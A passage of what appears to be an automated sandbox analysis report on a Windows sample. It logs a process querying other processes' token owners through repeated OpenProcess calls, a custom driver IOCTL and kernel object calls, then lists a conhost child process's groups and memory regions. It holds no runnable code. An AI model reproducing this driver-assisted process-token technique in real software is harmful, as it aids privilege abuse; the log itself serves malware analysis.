Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.823] CloseHandle (hObject=0x1a8) returned 1 [0267.823] CloseHandle (hObject=0x180) returned 1 [0267.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2b0) returned 0x180 [0267.823] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.823] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006904f080, HandleInformation=0x0) returned 0x0 [0267.823] ObOpenObjectByPointer (in: Object=0xffffe0006904f080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.823] ObfDereferenceObject (Object=0xffffe0006904f080) returned 0x28021 [0267.823] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.823] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.823] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.823] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.824] CloseHandle (hObject=0x1a8) returned 1 [0267.824] CloseHandle (hObject=0x180) returned 1 [0267.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x938) returned 0x0 [0267.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x48c) returned 0x180 [0267.824] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.825] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a06f080, HandleInformation=0x0) returned 0x0 [0267.825] ObOpenObjectByPointer (in: Object=0xffffe0006a06f080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.825] ObfDereferenceObject (Object=0xffffe0006a06f080) returned 0x30012 [0267.825] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.825] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.825] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.825] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.826] CloseHandle (hObject=0x1a8) returned 1 [0267.826] CloseHandle (hObject=0x180) returned 1 [0267.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x704) returned 0x180 [0267.826] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.826] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a43c840, HandleInformation=0x0) returned 0x0 [0267.826] ObOpenObjectByPointer (in: Object=0xffffe0006a43c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.826] ObfDereferenceObject (Object=0xffffe0006a43c840) returned 0x38020 [0267.826] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.826] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.826] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.826] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.827] CloseHandle (hObject=0x1a8) returned 1 [0267.827] CloseHandle (hObject=0x180) returned 1 [0267.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe04) returned 0x180 [0267.828] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.828] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a718840, HandleInformation=0x0) returned 0x0 [0267.828] ObOpenObjectByPointer (in: Object=0xffffe0006a718840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.828] ObfDereferenceObject (Object=0xffffe0006a718840) returned 0x2ffe9 [0267.828] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.828] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.828] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.828] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.829] CloseHandle (hObject=0x1a8) returned 1 [0267.829] CloseHandle (hObject=0x180) returned 1 [0267.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe34) returned 0x180 [0267.829] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.829] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006a357840, HandleInformation=0x0) returned 0x0 [0267.829] ObOpenObjectByPointer (in: Object=0xffffe0006a357840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.829] ObfDereferenceObject (Object=0xffffe0006a357840) returned 0x30007 [0267.829] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.829] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.829] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.829] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.830] CloseHandle (hObject=0x1a8) returned 1 [0267.830] CloseHandle (hObject=0x180) returned 1 [0267.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x578) returned 0x180 [0267.831] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.831] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00068421540, HandleInformation=0x0) returned 0x0 [0267.831] ObOpenObjectByPointer (in: Object=0xffffe00068421540, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.831] ObfDereferenceObject (Object=0xffffe00068421540) returned 0x27fda [0267.831] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.831] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.831] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.831] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.832] CloseHandle (hObject=0x1a8) returned 1 [0267.832] CloseHandle (hObject=0x180) returned 1 [0267.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb24) returned 0x180 [0267.832] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.832] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe0006919c840, HandleInformation=0x0) returned 0x0 [0267.832] ObOpenObjectByPointer (in: Object=0xffffe0006919c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.832] ObfDereferenceObject (Object=0xffffe0006919c840) returned 0x2801e [0267.832] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.832] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.832] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.832] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.833] CloseHandle (hObject=0x1a8) returned 1 [0267.833] CloseHandle (hObject=0x180) returned 1 [0267.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa40) returned 0x180 [0267.833] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.833] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00068441840, HandleInformation=0x0) returned 0x0 [0267.833] ObOpenObjectByPointer (in: Object=0xffffe00068441840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.833] ObfDereferenceObject (Object=0xffffe00068441840) returned 0x27fe0 [0267.833] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.833] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.833] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.833] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.834] CloseHandle (hObject=0x1a8) returned 1 [0267.834] CloseHandle (hObject=0x180) returned 1 [0267.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa54) returned 0x180 [0267.834] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.834] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00068467840, HandleInformation=0x0) returned 0x0 [0267.834] ObOpenObjectByPointer (in: Object=0xffffe00068467840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.834] ObfDereferenceObject (Object=0xffffe00068467840) returned 0x3801a [0267.834] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.835] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.835] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.835] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.836] CloseHandle (hObject=0x1a8) returned 1 [0267.836] CloseHandle (hObject=0x180) returned 1 [0267.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdec) returned 0x180 [0267.836] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0267.836] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe000685a6840, HandleInformation=0x0) returned 0x0 [0267.836] ObOpenObjectByPointer (in: Object=0xffffe000685a6840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000f98) returned 0x0 [0267.836] ObfDereferenceObject (Object=0xffffe000685a6840) returned 0x28018 [0267.836] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000f98, DesiredAccess=0x8, TokenHandle=0xffffe00069d8a740 | out: TokenHandle=0xffffe00069d8a740*=0x1a8) returned 0x0 [0267.836] ZwClose (Handle=0xffffffff80000f98) returned 0x0 [0267.836] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0267.836] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0267.837] CloseHandle (hObject=0x1a8) returned 1 [0267.837] CloseHandle (hObject=0x180) returned 1 [0267.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x190) returned 0x0 [0267.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xed4) returned 0x0 [0267.837] GetLastError () returned 0x57 [0267.837] SetLastError (dwErrCode=0x57) [0267.837] GetLastError () returned 0x57 [0267.838] SetLastError (dwErrCode=0x57) [0267.838] GetLastError () returned 0x57 [0267.838] SetLastError (dwErrCode=0x57) [0267.838] GetVersion () returned 0x23f00206 [0267.838] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0267.838] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x14fec0 | out: lpConsoleScreenBufferInfo=0x14fec0) returned 0 [0267.838] WriteFile (in: hFile=0xc, lpBuffer=0x14e900*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x14e220, lpOverlapped=0x0 | out: lpBuffer=0x14e900*, lpNumberOfBytesWritten=0x14e220*=0x1d, lpOverlapped=0x0) returned 1 [0267.839] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14feb8 | out: phModule=0x14feb8) returned 0 [0267.839] ExitProcess (uExitCode=0x1) Thread: id = 160 os_tid = 0xea4 Thread: id = 795 os_tid = 0xe50 Thread: id = 813 os_tid = 0xf10 Process: id = "27" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x76286000" os_pid = "0xdec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xa40" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1892 start_va = 0x7f48f000 end_va = 0x7f48ffff entry_point = 0x0 region_type = private name = "private_0x000000007f48f000" filename = "" Region: id = 1893 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1894 start_va = 0x8731870000 end_va = 0x873188ffff entry_point = 0x0 region_type = private name = "private_0x0000008731870000" filename = "" Region: id = 1895 start_va = 0x8731890000 end_va = 0x87318a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008731890000" filename = "" Region: id = 1896 start_va = 0x87318b0000 end_va = 0x87318effff entry_point = 0x0 region_type = private name = "private_0x00000087318b0000" filename = "" Region: id = 1897 start_va = 0x7df5ff250000 end_va = 0x7ff5ff24ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff250000" filename = "" Region: id = 1898 start_va = 0x7ff7fcba0000 end_va = 0x7ff7fcbc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcba0000" filename = "" Region: id = 1899 start_va = 0x7ff7fcbcc000 end_va = 0x7ff7fcbccfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcbcc000" filename = "" Region: id = 1900 start_va = 0x7ff7fcbce000 end_va = 0x7ff7fcbcffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcbce000" filename = "" Region: id = 1901 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1902 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1903 start_va = 0x8731870000 end_va = 0x873187ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008731870000" filename = "" Region: id = 1904 start_va = 0x8731880000 end_va = 0x8731886fff entry_point = 0x0 region_type = private name = "private_0x0000008731880000" filename = "" Region: id = 1905 start_va = 0x87318f0000 end_va = 0x87319adfff entry_point = 0x87318f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1906 start_va = 0x87319b0000 end_va = 0x8731aaffff entry_point = 0x0 region_type = private name = "private_0x00000087319b0000" filename = "" Region: id = 1907 start_va = 0x8731ab0000 end_va = 0x8731aeffff entry_point = 0x0 region_type = private name = "private_0x0000008731ab0000" filename = "" Region: id = 1908 start_va = 0x8731af0000 end_va = 0x8731af0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008731af0000" filename = "" Region: id = 1909 start_va = 0x8731b00000 end_va = 0x8731b06fff entry_point = 0x0 region_type = private name = "private_0x0000008731b00000" filename = "" Region: id = 1910 start_va = 0x8731b10000 end_va = 0x8731b10fff entry_point = 0x0 region_type = private name = "private_0x0000008731b10000" filename = "" Region: id = 1911 start_va = 0x8731b20000 end_va = 0x8731b20fff entry_point = 0x0 region_type = private name = "private_0x0000008731b20000" filename = "" Region: id = 1912 start_va = 0x8731c30000 end_va = 0x8731c3ffff entry_point = 0x0 region_type = private name = "private_0x0000008731c30000" filename = "" Region: id = 1913 start_va = 0x8731c40000 end_va = 0x8731dc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008731c40000" filename = "" Region: id = 1914 start_va = 0x8731dd0000 end_va = 0x8731f50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008731dd0000" filename = "" Region: id = 1915 start_va = 0x8731f60000 end_va = 0x873335ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008731f60000" filename = "" Region: id = 1916 start_va = 0x7ff7fcaa0000 end_va = 0x7ff7fcb9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcaa0000" filename = "" Region: id = 1917 start_va = 0x7ff7fcbca000 end_va = 0x7ff7fcbcbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcbca000" filename = "" Region: id = 1918 start_va = 0x7ffaed340000 